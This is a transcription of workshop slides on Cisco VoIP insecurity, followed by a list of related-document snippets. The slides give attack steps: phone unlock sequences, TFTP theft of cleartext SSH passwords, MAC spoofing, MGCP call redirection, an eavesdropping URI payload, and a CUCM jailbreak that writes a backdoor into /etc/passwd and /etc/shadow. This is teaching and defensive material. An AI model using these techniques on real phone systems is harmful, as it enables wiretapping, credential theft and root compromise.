Cisco VoIP (in)security
|
|
|
- Lindsay Alexander
- 10 years ago
- Views:
Transcription
1 Cisco VoIP (in)security Sandro GAUCI Joffrey CZARNY
2 VoIP VoIP (Voice over IP) is a technology to allows Voice communication over IP network
3 Call flow
4 VLAN in Voice infrastructure Wikipedia definition: VLANs are created to provide the segmentation services traditionally provided by routers in LAN configurations. VLANs address issues such as scalability, security, and network management. Routers in VLAN topologies provide broadcast filtering, security, address summarization, and traffic flow management. By definition, switches may not bridge IP traffic between VLANs as it would violate the integrity of the VLAN broadcast domain. VLAN segmentation Filtering rules or ACLs VLAN segmentation 802.1X
5 VLAN in Voice infrastructure VLAN discovery Voice vlan can be easily discovered Just grab information from CDP packet Use preferred sniffer tools (tcpdump, wireshark ) Use Voiphopper Grab information from IP phone Manual attack
6 VLAN in Voice infrastructure Practical To manage 802.1Q on Linux: Module 8021q from the kernel Vconfig tool To manage 802.1Q on Windows Install NDISprot drivers general/ndisinstall/programinstall.htm Configure virtual interface
7 Info gathering from hardware phone itself physical bridging
8 Info gathering from hardware phone itself Passive Ethernet tap Passive Network TAP: PoE go trough J passive_ethernet_tap.jsp
9 Info gathering from hardware phone itself Ethernet Switch TAP Port- Mirroring / PoE Pass- Through USB Powered comm.com
10 Info gathering from hardware phone itself bypassing lock/phone security restriction Grab technical information on IP Phones is easy.. 2 clic and one default PIN/password Cisco => Cisco Unlock Cisco phone security restriction **# unlock **#** reboot # and power on, then #0* (factory reset)
11 Info gathering from hardware phone itself bypassing lock/phone security restriction Grab technical information on Cisco phones
12 Info gathering from hardware phone itself bypassing lock/phone security restriction Grab technical information on Cisco phones
13 Info gathering from TFTP service It s possible to brute force TFTP service to get some default configuration files SEPDefault.xml SIPDefault.xml è SIP port OS79XX.conf è Firmware version Ringlist.conf SEP[mac@].cnf.xml è Clear text password
14 Info gathering from TFTP service SSH password Recover SSH credentials from configuration files: $ get SEP[mac@].cnf.xml
15 How to SSH to the phone ssh password: [password] login: default password: user $ uname - a CNU6- OS 8.4(0.79) 3.3(0.2) CP- 7941G BCM1100- C1(MIPS32) 15
16 TFTP Theft demo 16
17 VoIP devices discovery From a port scan result it s possible to identify VoIP product/software. Some default port on VoIP server. Signaling ports: TCP 2000 Skinny/SCCP TCP/UDP 5060 SIP UDP 2427 MGCP
18 Information Gathering 1st Exercise Call servers TFTP servers Version of firmware used on IP phones Gateway
19 Information within Signaling protocols
20 Signaling protocols used in CUCM SIP: Session Initiation Protocol is (RFC 3261, RFC 2543 obsolet, add details RFC 3265) H.323: is a set of protocols for communication of voice, image and data over IP. It is a protocol developed by the ITU- T which defines it as: "Multimedia Communication Systems Packet. It is derived from the H.320 protocol, used on ISDN symmetric (client- client). MGCP: Media Gateway Control Protocol is an asymmetric protocol (UDP port 2427) (Client- Server) developed by Telcordia and Level 3 Communications. It is distinguished for example of SIP and H.323, which, themselves, are symmetrical (client- client). SCCP (Cisco): Skinny Call Control Protocol is a TCP protocol ( port 2000 / 2443 for Secure- SCCP). The advantage of Skinny usage is that taking very little bandwidth so it is used for communications between IP phones and CallManager as well as to monitor a conference.
21 SIP SIP in CUCM is different J Register does used credential but based also on MAC@
22 Peer to Peer SIP SIP works without a PBX (proxy / registrar) One phone can call another directly in case on SIP third party in CUCM May not be used officially but still supported
23 SIP Digest Leak INVITE 200 OK
24 SIP Digest Leak BYE 200 OK
25 SIP Digest Leak BYE 407 Challenge
26
27 SCCP SCCP (Cisco): Skinny Call Control Protocol is a TCP protocol ( port 2000 / 2443 for Secure- SCCP). The advantage of Skinny usage is that taking very little bandwidth so it is used for communications between IP phones and CallManager as well as to monitor a conference. SCCP use TCP session with keep alive state SCCP is not encrypted by default use port TCP 2000 (really readable, wireshark is our friend) Secure- SCCP use TCP port 2443
28 SCCP Grab Forced Authorization Codes «FAC»
29 SCCP Skinny Proxy Python Skinny class from Scapy # Station - > Callmanager 0x0000: "SkinnyMessageKeepAlive", 0x0001: "SkinnyMessageRegister", 0x0002: "SkinnyMessageIpPort", 0x0003: "SkinnyMessageKeypadButton", 0x0004: "SkinnyMessageEnblocCall", 0x0005: "SkinnyMessageStimulus", 0x0006: "SkinnyMessageOffHook", 0x0007: "SkinnyMessageOnHook", 0x0008: "SkinnyMessageHookFlash", 0x0009: "SkinnyMessageForwardStatReq", 0x000A: "SkinnyMessageSpeedDialStatReq", 0x000B: "SkinnyMessageLineStatReq", 0x000C: "SkinnyMessageConfigStatReq", 0x000D: "SkinnyMessageTimeDateReq", 0x000E: "SkinnyMessageButtonTemplateReq", 0x000F: "SkinnyMessageVersionReq", 0x0010: "SkinnyMessageCapabilitiesRes", 0x0011: "SkinnyMessageMediaPortList", 0x0012: "SkinnyMessageServerReq,
30 SCCP Callmanager hijack / spoofing + crash phone Cisco IP phones use the MAC@ as identification. With Cisco IP phone soft (79X0 emulation), it s possible to carry out an identity spoofing VTGO IP-BLUE Man-in-the-Middle attack with spoofed tftp config file
31 Configure VTGO to spoof MAC 31
32 Configure VTGO to spoof MAC refer to: hitb_lab_information.txt 32
33 Configure VTGO to spoof MAC 33
34 SCCP Exercises Play with Skinny proxy Check the code Spoof a phone With WinVLAN and VTGO With Ettercap filter
35 MGCP MGCP: Media Gateway Control Protocol is an asymmetric protocol (UDP port 2427) (Client- Server) developed by Telcordia and Level 3 Communications. It is distinguished for example of SIP and H.323, which, themselves, are symmetrical (client- client). MGCP use UDP and does not implement authentication step
36 MGCP MGCP (Media Gateway Control Protocol) IETF, Softswitch (CallAgent)<->MGW CallAgents->MGW (2427/UDP) MGW->CallAgents (2727/UDP) Used to control MGWs AoC (Advise Of Charge) towards CPE
37 MGCP Open Pcap file: MGCP- CCM- VoIPGW.pcap
38 MGCP Intial Step AUEP AUdit End Point: AUEP 1500 MGCP 0.1 Response: Z: S0/SU0/DS1-0/1 Z: S0/SU0/DS1-0/2 Z: S0/SU0/DS1-0/3 Z: S0/SU0/DS1-0/4
39 MGCP Interrogate an individual end point Capabilities request : AUEP 1500 S0/SU1/DS1-0/[email protected] MGCP 0.1 F: A L: p:10-20, a:pcmu;pcma;g.nx64, b:64, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:10-220, a:g.729;g.729a;g.729b, b:8, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:10-110, a:g ;g.728, b:16, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:10-70, a:g , b:24, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:10-50, a:g , b:32, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:30-270, a:g H;G.723;G.723.1a- H, b:6, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre L: p:30-330, a:g L;G.723.1a- L, b:5, e:on, gc:1, s:on, t:10, r:g, nt:in;atm;local, v:t;g;d;l;h;r;atm;sst;pre
40 MGCP Interrogate an individual end point: AUEP 1000 MGCP 0.1 F: R,D,S,X,N,I,T,O,ES I: 2BD85 N: X: 1 R: D/[0-9ABCD*#](N) S: O: T: ES:
41 MGCP Interrogate an individual end point: AUCX 1500 MGCP 0.1 I: 2BD85 F: C,N,L,M,LC,P C: D e6dd000000F580000aac N: L: p:20, a:pcmu, s:off, t:b8 M: sendrecv P: PS=4148, OS=663680, PR=770, OR=122723, PL=0, JI=0, LA=0 v=0 c=in IP m=audio RTP/AVP a=rtpmap:100 X- NSE/8000
42 MGCP Redirect individual end point: MDCX 1000 MGCP 0.1 M=audio RTP/AVP C=IN IP
43 MGCP RTP redirection
44 MGCP RTP redirection
45 RTP - Media protocol weaknesses October 12, 2011 slide 39
46 Wiretapping RTP is not encrypted by default so Wiretapping is possible October 12, 2011 slide 40
47 Wiretapping RTP is not encrypted by default so Wiretapping is possible October 12, 2011 slide 41
48 Wiretapping RTP is not encrypted by default so Wiretapping is possible October 12, 2011 slide 42
49 RTP Media Injection Vulnerability Media channel packets are unauthenticated and unencrypted Attack: Inject new media into an active media channel Replace media in an active media channel Effect: Modification of media Replacement of media Deletion of media
50 RTP injection ISECPartners published at the BlackHat07 allowing to inject sound during a conversation. How it s possible? RTP unencrypted UDP makes injection easy SSRC is static for the entirety of a conversation Sequence number & Timestamp are monotonically increasing October 12, 2011 slide 44
51 RTP Covert Channel Vulnerability Media channel packets are unauthenticated and unencrypted Attack: Manipulate an active media channel and embed covert communication data Extract covert communication data from an active media channel Effect: Send covert data using someone else s call media Receive covert data embedded into someone else s call media
52 RTP Covert Channel Tools SteganRTP Vo2IP No longer available Mitigation Authenticate or verify media packets Encrypt the media channel (some protection)
53 Unified Communication and Features abuse For Fun and Profit!! October 12, 2011 slide 47
54 Mobility features abuse (Cisco) [PSIRT ] Remote login Full DISCLOSURE: Hack.lu conference October 2007 h"p://x.x.x.x/emapp/emappservlet?device=sepxxxxxxxxxxxx&userid=xxx&seq=xxx October 12, 2011 slide 48
55 Mobility features abuse (Cisco) [PSIRT ] Remote login Full DISCLOSURE: Hack.lu conference October 2007 h"p://x.x.x.x/emapp/emappservlet?device=sepxxxxxxxxxxxx&userid=xxx&seq=xxx October 12, 2011 slide 48
56 Mobility features abuse (Cisco) [PSIRT ] Remote logout Full DISCLOSURE: Hack.lu conference October 2007 h"p://x.x.x.x/emapp/emappservlet?device=sepxxxxxxxxxxxx&dologout=true October 12, 2011 slide 49
57 Presence Management Software Telesnap of Snapware; now Netwise, provided presence management system. This system performs some requests on IP phones An account is created on the call Manager with full rights on all IP phones So, if you catch this credential you October 12, 2011 slide 50
58 Cisco URIs command The URIs provide access to embedded phone features such as placing calls, playing audio files, and invoking builtin object features. URIs for Pressing Buttons on the Phone URIs for Invoking SoftKeyFunctionality URIs to Control RTP Streaming Miscellaneous URIs h"p:// programming/guide/xsi70uri.html October 12, 2011 slide 51
59 Cisco URIs command In our case we used the URIs to Control RTP Streaming. You can invoke RTP streaming via URIs command. You can instruct the phone to transmit or receive an RTP stream with the following specifications. So it s possible to perform a wiretapping in the meeting room or director s office. <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\ "URL=\"".RTPTx: :32000."\"/> </CiscoIPPhoneExecute> October 12, 2011 slide 52
60 Cisco Unified IP Phone Remote Eavesdropping URI commands allow to make a call to play a ring to send RTP stream vlc rtp://@:32000 Full DISCLOSURE: Hack.lu conference October 2007 October 12, 2011 slide 53
61 Cisco Unified IP Phone Remote Eavesdropping Internal URI command allow a IP phone to send RTP stream h"p:// sr phone.shtml October 12, 2011 slide 54
62 Input validation flaw in Webdialer [PSIRT ] Full DISCLOSURE: IT underground conference February 2008 October 12, 2011 slide 55
63 Input validation flaw in Webdialer [PSIRT ] Full DISCLOSURE: IT underground conference February 2008 October 12, 2011 slide 56
64 Input validation flaw in Webdialer [PSIRT ] Full DISCLOSURE: IT underground conference February 2008 October 12, 2011 slide 57
65 Input validation flaw in Webdialer [PSIRT ] Full DISCLOSURE: IT underground conference February October 12, 2011 slide 58
66 Input validation flaw in Webdialer [PSIRT ] Full DISCLOSURE: IT underground conference February October 12, 2011 slide 59
67 CUCM Jailbreak Situation: you have access to SSH console You want (need) root access One method was outlined by Recurity :) 66
68 CUCM Jailbreak Step 1: SSH to CUCM file dump sftpdetails../.ssh/id_dsa connect with this key as sftpuser using sftp modify sftp_connect.sh 67
69 CUCM Jailbreak sftp_connect.sh should contain your backdoor We write to /etc/passwd and /etc/shadow chattr - i /etc/passwd /etc/shadow first! upload the bash script get it to execute: file get tftp os7920.txt 68
70
71 Solutions? encryption to the rescue (authentication & confidentiality) block all traffic on voice gateway (only allow CUCM) disable services on the phone (e.g. HTTP) 70
72 Questions / Answers Thanks for you attention Thanks to HITB team
Transparent weaknesses in VoIP
Transparent weaknesses in VoIP Peter Thermos [email protected] 2007 Palindrome Technologies, All Rights Reserved 1 of 56 Speaker Background Consulting Government and commercial organizations,
The Trivial Cisco IP Phones Compromise
Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group [email protected] http://www.sys-security.com September 2002
Voice Over IP (VoIP) Denial of Service (DoS)
Introduction Voice Over IP (VoIP) Denial of Service (DoS) By Mark Collier Chief Technology Officer SecureLogix Corporation [email protected] Denial of Service (DoS) is an issue for any IP network-based
Voice over IP (VoIP) Vulnerabilities
Voice over IP (VoIP) Vulnerabilities The Technical Presentation Diane Davidowicz NOAA Computer Incident Response Team N-CIRT [email protected] "Security problems in state of the art IP-Telephony
VOICE OVER IP SECURITY
VOICE OVER IP SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without
NATIONAL SECURITY AGENCY Ft. George G. Meade, MD
NATIONAL SECURITY AGENCY Ft. George G. Meade, MD Serial: I732-010R-2008 30 April 2008 Network Infrastructure Division Systems and Network Analysis Center Activating Authentication and Encryption for Cisco
Mediatrix 4404 Step by Step Configuration Guide June 22, 2011
Mediatrix 4404 Step by Step Configuration Guide June 22, 2011 Proprietary 2011 Media5 Corporation Table of Contents First Steps... 3 Identifying your MAC Address... 3 Identifying your Dynamic IP Address...
CyberData VoIP V2 Speaker with VoIP Clock Kit Configuration Guide for OmniPCX Enterprise
CyberData VoIP V2 Speaker with VoIP Clock Kit Configuration Guide for OmniPCX Enterprise CyberData Corporation 2555 Garden Road Monterey, CA 93940 T:831-373-2601 F: 831-373-4193 www.cyberdata.net 2 Introduction
640-460 - Implementing Cisco IOS Unified Communications (IIUC)
640-460 - Implementing Cisco IOS Unified Communications (IIUC) Course Introduction Course Introduction Module 1 - Cisco Unified Communications System Introduction Cisco Unified Communications System Introduction
CTS2134 Introduction to Networking. Module 8.4 8.7 Network Security
CTS2134 Introduction to Networking Module 8.4 8.7 Network Security Switch Security: VLANs A virtual LAN (VLAN) is a logical grouping of computers based on a switch port. VLAN membership is configured by
Configuration Notes 283
Mediatrix 4400 Digital Gateway VoIP Trunking with a Legacy PBX June 21, 2011 Proprietary 2011 Media5 Corporation Table of Contents Table of Contents... 2 Introduction... 3 Mediatrix 4400 Digital Gateway
Protect Yourself Against VoIP Hacking. Mark D. Collier Chief Technology Officer SecureLogix Corporation
Protect Yourself Against VoIP Hacking Mark D. Collier Chief Technology Officer SecureLogix Corporation What Will Be Covered How to assess the security of your IPT network: In house/external and ground
Who is Watching You? Video Conferencing Security
Who is Watching You? Video Conferencing Security Navid Jam Member of Technical Staff March 1, 2007 SAND# 2007-1115C Computer and Network Security Security Systems and Technology Video Conference and Collaborative
White paper. SIP An introduction
White paper An introduction Table of contents 1 Introducing 3 2 How does it work? 3 3 Inside a normal call 4 4 DTMF sending commands in sip calls 6 5 Complex environments and higher security 6 6 Summary
EINTE LAB EXERCISES LAB EXERCISE #5 - SIP PROTOCOL
EINTE LAB EXERCISES LAB EXERCISE #5 - SIP PROTOCOL PREPARATIONS STUDYING SIP PROTOCOL The aim of this exercise is to study the basic aspects of the SIP protocol. Before executing the exercise you should
How to make free phone calls and influence people by the grugq
VoIPhreaking How to make free phone calls and influence people by the grugq Agenda Introduction VoIP Overview Security Conclusion Voice over IP (VoIP) Good News Other News Cheap phone calls Explosive growth
VoIP Security regarding the Open Source Software Asterisk
Cybernetics and Information Technologies, Systems and Applications (CITSA) 2008 VoIP Security regarding the Open Source Software Asterisk Prof. Dr.-Ing. Kai-Oliver Detken Company: DECOIT GmbH URL: http://www.decoit.de
To ensure you successfully install Timico VoIP for Business you must follow the steps in sequence:
To ensure you successfully install Timico VoIP for Business you must follow the steps in sequence: Firewall Settings - you may need to check with your technical department Step 1 Install Hardware Step
Linux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
Conducting an IP Telephony Security Assessment
Conducting an IP Telephony Security Assessment Mark D. Collier Chief Technology Officer [email protected] www.securelogix.com Presentation Outline Ground rules and scope Discovery Security policy
Basic Vulnerability Issues for SIP Security
Introduction Basic Vulnerability Issues for SIP Security By Mark Collier Chief Technology Officer SecureLogix Corporation [email protected] The Session Initiation Protocol (SIP) is the future
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
Session Initiation Protocol (SIP) Vulnerabilities. Mark D. Collier Chief Technology Officer SecureLogix Corporation
Session Initiation Protocol (SIP) Vulnerabilities Mark D. Collier Chief Technology Officer SecureLogix Corporation What Will Be Covered Introduction to SIP General SIP security SIP vulnerabilities and
SS7 & LTE Stack Attack
SS7 & LTE Stack Attack Ankit Gupta Black Hat USA 2013 [email protected] Introduction With the evolution of IP network, Telecom Industries are using it as their core mode of communication for their network
Lab VI Capturing and monitoring the network traffic
Lab VI Capturing and monitoring the network traffic 1. Goals To gain general knowledge about the network analyzers and to understand their utility To learn how to use network traffic analyzer tools (Wireshark)
NTP VoIP Platform: A SIP VoIP Platform and Its Services
NTP VoIP Platform: A SIP VoIP Platform and Its Services Speaker: Dr. Chai-Hien Gan National Chiao Tung University, Taiwan Email: [email protected] Date: 2006/05/02 1 Outline Introduction NTP VoIP
Knowledgebase Solution
Knowledgebase Solution Goal Enable coexistence of a 3 rd -party VPN / Firewall with an EdgeMarc appliance. Describe characteristics and tradeoffs of different topologies. Provide configuration information
Sample Configuration for SIP Trunking between Avaya IP Office R8.0 and Cisco Unified Communications Manager 8.6.2 Issue 1.0
Avaya Solution & Interoperability Test Lab Sample Configuration for SIP Trunking between Avaya IP Office R8.0 and Cisco Unified Communications Manager 8.6.2 Issue 1.0 Abstract These Application Notes describe
VoIP some threats, security attacks and security mechanisms. Lars Strand RiskNet Open Workshop Oslo, 24. June 2009
VoIP some threats, security attacks and security mechanisms Lars Strand RiskNet Open Workshop Oslo, 24. June 2009 "It's appalling how much worse VoIP is compared to the PSTN. If these problems aren't fixed,
640-461: Introducing Cisco Voice and Unified Communications Administration (ICOMM) v8.0 Course Introduction
640-461: Introducing Cisco Voice and Unified Communications Administration (ICOMM) v8.0 Course Introduction Course Introduction Module 01 - Overview of Cisco Unified Communications Solutions Understanding
Application Note. Firewall Requirements for the Onsight Mobile Collaboration System and Hosted Librestream SIP Service v5.0
Application Note Firewall Requirements for the Onsight Mobile Collaboration System and Hosted Librestream SIP Service v5.0 1 FIREWALL REQUIREMENTS FOR ONSIGHT MOBILE VIDEO COLLABORATION SYSTEM AND HOSTED
Version 0.1 June 2010. Xerox WorkCentre 7120 Fax over Internet Protocol (FoIP)
Version 0.1 June 2010 Xerox WorkCentre 7120 Fax over Internet Protocol (FoIP) Thank you for choosing the Xerox WorkCentre 7120. Table of Contents Introduction.........................................
SIP Trunk Recording Configuration For CUCM 6.x Version 8.0
SIP Trunk Recording Configuration For CUCM 6.x Version 8.0 REVCORD Voice Logging Systems 10575 Katy Freeway, Suite 470, Houston, Texas 77024 Phone 281-404-7040 Fax 281-404-5323 Toll Free: 1-866-559-2188
- Basic Router Security -
1 Enable Passwords - Basic Router Security - The enable password protects a router s Privileged mode. This password can be set or changed from Global Configuration mode: Router(config)# enable password
How to Configure the NEC SV8100 for use with Integra Telecom SIP Solutions
How to Configure the NEC SV8100 for use with Integra Telecom SIP Solutions Overview: This document provides a reference for configuration of the NEC SV8100 IP PBX to connect to Integra Telecom SIP trunks.
How To Understand The Purpose Of A Sip Aware Firewall/Alg (Sip) With An Alg (Sip) And An Algen (S Ip) (Alg) (Siph) (Network) (Ip) (Lib
NetVanta Unified Communications Technical Note The Purpose of a SIP-Aware Firewall/ALG Introduction This technical note will explore the purpose of a Session Initiation Protocol (SIP)-aware firewall/application
Asymetrical keys. Alices computer generates a key pair. A public key: XYZ123345 (Used to encrypt) A secret key: ABC98765 (Used to decrypt)
Encryption keys Symmetrical keys Same key used for encryption and decryption Exchange of symmetrical keys between parties difficult without risk of interception Asymmetrical keys One key for encryption
Configuring the Dolby Conference Phone with Cisco Unified Communications Manager
Configuring the Dolby Conference Phone with Cisco Unified Communications Manager Version 1.2 December 10, 2015 This product is protected by one or more patents in the United States and elsewhere. For more
VOIP-211RS/210RS/220RS/440S. SIP VoIP Router. User s Guide
VOIP-211RS/210RS/220RS/440S SIP VoIP Router User s Guide Trademarks Contents are subject to revise without prior notice. All trademarks belong to their respective owners. FCC Warning This equipment has
Cconducted at the Cisco facility and Miercom lab. Specific areas examined
Lab Testing Summary Report July 2009 Report 090708 Product Category: Unified Communications Vendor Tested: Key findings and conclusions: Cisco Unified Communications solution uses multilayered security
P160S SIP Phone Quick User Guide
P160S SIP Phone Quick User Guide Version 2.2 TABLE OF CONTENTS 1.0 INTRODUCTION... 1 2.0 PACKAGE CONTENT... 1 3.0 LIST OF FIGURES... 2 4.0 SUMMARY OF KEY FUNCTIONS... 3 5.0 CONNECTING THE IP PHONE... 4
Threats to be considered (1) ERSTE GROUP
VoIP-Implementation Lessons Learned Philipp Schaumann Erste Group Bank AG Group IT-Security [email protected] http://sicherheitskultur.at/ Seite 1 Threats to be considered (1) Eavesdropping
White Paper. Solutions to VoIP (Voice over IP) Recording Deployment
White Paper Solutions to VoIP (Voice over IP) Recording Deployment Revision 2.1 September 2008 Author: Robert Wright ([email protected]), BSc (Hons) Ultra Electronics AudioSoft, October
Firewall Support for SIP
Firewall Support for SIP The Firewall Support for SIP feature integrates Cisco IOS firewalls, Voice over IP (VoIP) protocol, and Session Initiation Protocol (SIP) within a Cisco IOS-based platform, enabling
Recommended IP Telephony Architecture
Report Number: I332-009R-2006 Recommended IP Telephony Architecture Systems and Network Attack Center (SNAC) Updated: 1 May 2006 Version 1.0 [email protected] This Page Intentionally Left Blank ii Warnings
hackers 2 hackers conference III voip (in)security luiz eduardo cissp, ceh, cwne, gcih
luiz eduardo cissp, ceh, cwne, gcih who am I? networking guy security guy employed by Aruba Networks wlan network for defcon, blackhat & ccc regular speaker at cons founder, dc55.org and... agenda intro
NATIONAL SECURITY AGENCY Ft. George G. Meade, MD
NATIONAL SECURITY AGENCY Ft. George G. Meade, MD Serial: I732-001R-2010 28 April 2010 Network Infrastructure Division Systems and Network Analysis Center Activating Authentication and Encryption for Cisco
An Introduction to VoIP Protocols
An Introduction to VoIP Protocols www.netqos.com Voice over IP (VoIP) offers the vision of a converged network carrying multiple types of traffic (voice, video, and data, to name a few). To carry out this
Application Note. Onsight Connect Network Requirements V6.1
Application Note Onsight Connect Network Requirements V6.1 1 ONSIGHT CONNECT SERVICE NETWORK REQUIREMENTS... 3 1.1 Onsight Connect Overview... 3 1.2 Onsight Connect Servers... 4 Onsight Connect Network
159.334 Computer Networks. Voice over IP (VoIP) Professor Richard Harris School of Engineering and Advanced Technology (SEAT)
Voice over IP (VoIP) Professor Richard Harris School of Engineering and Advanced Technology (SEAT) Presentation Outline Basic IP phone set up The SIP protocol Computer Networks - 1/2 Learning Objectives
District of Columbia Courts Attachment 1 Video Conference Bridge Infrastructure Equipment Performance Specification
1.1 Multipoint Control Unit (MCU) A. The MCU shall be capable of supporting (20) continuous presence HD Video Ports at 720P/30Hz resolution and (40) continuous presence ports at 480P/30Hz resolution. B.
Villains and Voice Over IP
Villains and Voice Over IP Heather Bonin ECE 578 March 7, 2004 Table of Contents Introduction... 3 How VOIP Works... 3 Ma Bell and her Babies... 3 VoIP: The New Baby on the Block... 3 Security Issues...
SIP Trunking Quick Reference Document
SIP Trunking Quick Reference Document Publication Information SAMSUNG TELECOMMUNICATIONS AMERICA reserves the right without prior notice to revise information in this publication for any reason. SAMSUNG
IP Link Best Practices for Network Integration and Security. Introduction...2. Passwords...4 ACL...5 VLAN...6. Protocols...6. Conclusion...
IP Link Best Practices for Network Integration and Security Table of Contents Introduction...2 Passwords...4 ACL...5 VLAN...6 Protocols...6 Conclusion...9 Abstract Extron IP Link technology enables A/V
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Cisco SPA901 1-Line IP Phone Cisco Small Business IP Phone
Cisco SPA901 1-Line IP Phone Cisco Small Business IP Phone Durable, Affordable, Feature-Rich IP Telephone for the Home Office and Business Small, affordable, single line business class IP Phone Connect
IP PBX. SD Card Slot. FXO Ports. PBX WAN port. FXO Ports LED, RED means online
1 IP PBX SD Card Slot FXO Ports PBX LAN port PBX WAN port FXO Ports LED, RED means online 2 Connect the IP PBX to Your LAN Internet PSTN Router Ethernet Switch FXO Ports 3 Access the PBX s WEB GUI The
Configuration Guide for Cisco Unified Communications Environments
Configuration Guide for Cisco Unified Communications Environments CA Unified Communications Monitor Version 3.7 This Documentation, which includes embedded help systems and electronically distributed materials,
General Network Security
4 CHAPTER FOUR General Network Security Objectives This chapter covers the following Cisco-specific objectives for the Identify security threats to a network and describe general methods to mitigate those
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests
VoIP Security Methodology and Results. NGS Software Ltd
VoIP Security Methodology and Results NGS Software Ltd Barrie Dempster Senior Security Consultant [email protected] Agenda VoIP Security Issues Assessment Methodology Case Study: Asterisk VoIP Security
Configuration of Applied VoIP Sip Trunks with the Toshiba CIX40, 100, 200 and 670
Configuration of Applied VoIP Sip Trunks with the Toshiba CIX40, 100, 200 and 670 Businesses Save Money with Toshiba s New SIP Trunking Feature Unlike gateway based solutions, Toshiba s MIPU/ GIPU8 card
IP Ports and Protocols used by H.323 Devices
IP Ports and Protocols used by H.323 Devices Overview: The purpose of this paper is to explain in greater detail the IP Ports and Protocols used by H.323 devices during Video Conferences. This is essential
Cisco CallManager configuration for BLU-103
Cisco CallManager configuration for BLU-103 This document details the steps required to configure a Cisco CallManager VoIP system to work with a BLU-103 VoIP interface. 10653 South River Front Pkwy, Suite
6.40A AudioCodes Mediant 800 MSBG
AudioCodes Mediant 800 MSBG Page 1 of 66 6.40A AudioCodes Mediant 800 MSBG 1. Important Notes Check the SIP 3 rd Party Validation Website for current validation status. The SIP 3 rd party Validation Website
Configuring the Edgewater 4550 for use with the Bluestone Hosted PBX
Configuring the Edgewater 4550 for use with the Bluestone Hosted PBX NOTE: This is an advisory document to be used as an aid to resellers and IT staff looking to use the Edgewater 4550 in conjunction with
Data Collection and Analysis: Get End-to-End Security with Cisco Connected Analytics for Network Deployment
White Paper Data Collection and Analysis: Get End-to-End Security with Cisco Connected Analytics for Network Deployment Cisco Connected Analytics for Network Deployment (CAND) is Cisco hosted, subscription-based
Hacking. Aims. Naming, Acronyms, etc. Sources
Free Technology Workshop Hacking Hands on with wireless LAN routers, packet capture and wireless security Organised by Steven Gordon Bangkadi 3 rd floor IT Lab 10:30-13:30 Friday 18 July 2014 http://ict.siit.tu.ac.th/moodle/.-----.-----.-----..----.
A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.
A firewall is a software- or hardware-based network security system that allows or denies network traffic according to a set of rules. Firewalls can be categorized by their location on the network: A network-based
Voice over IP Basics for IT Technicians
Voice over IP Basics for IT Technicians White Paper Executive summary The IP phone is coming or has arrived on desk near you. The IP phone is not a PC, but does have a number of hardware and software elements
Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials.
Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials. CHAPTER 5 OBJECTIVES Configure a router with an initial configuration. Use the
Avaya IP Office 8.1 Configuration Guide
Avaya IP Office 8.1 Configuration Guide Performed By tekvizion PVS, Inc. Contact: 214-242-5900 www.tekvizion.com Revision: 1.1 Date: 10/14/2013 Copyright 2013 by tekvizion PVS, Inc. All Rights Reserved.
VoIP Router TA G81022MS User Guide
VoIP Router TA G81022MS User Guide V. 1.0 TABLE OF CONTENTS TABLE OF CONTENTS...2 1.0 INTRODUCTION...1 2.0 PACKAGE CONTENT...1 3.0 SUMMARY OF LED & CONNECTOR DESCRIPTION...2 3.1 THE FRONT LEDS...2 3.2
Lab 12.1.7 Configure and Test Advanced Protocol Handling on the Cisco PIX Security Appliance
Lab 12.1.7 Configure and Test Advanced Protocol Handling on the Cisco PIX Security Appliance Objective Scenario Estimated Time: 20 minutes Number of Team Members: Two teams with four students per team
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
CS5008: Internet Computing
CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is
WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006
WIRELESS SECURITY Information Security in Systems & Networks Public Development Program Sanjay Goel University at Albany, SUNY Fall 2006 1 Wireless LAN Security Learning Objectives Students should be able
How To Fix A Hard Phone Bug
Dustin D. Trammell VoIP Security Research TippingPoint, a division of 3Com Computer Academic Underground About Me I)ruid / Dustin D. Trammell Employed by TippingPoint, a division of 3Com http://www.tippingpoint.com/security/
Note: these functions are available if service provider supports them.
Key Feature New Feature Remote Maintenance: phone can be diagnosed and configured by remote. Zero Config: automated provisioning and software upgrading even through firewall/nat. Centralized Management:
Setup Reference guide for PBX to SBC interconnection
Setup Reference guide for PBX to SBC interconnection Method of connection by "LAN interface only" i.e. SBC is placed behind the Perimeter Router / Fire-wall. Panasonic PBX (KX-TDE, NCP series), Media5
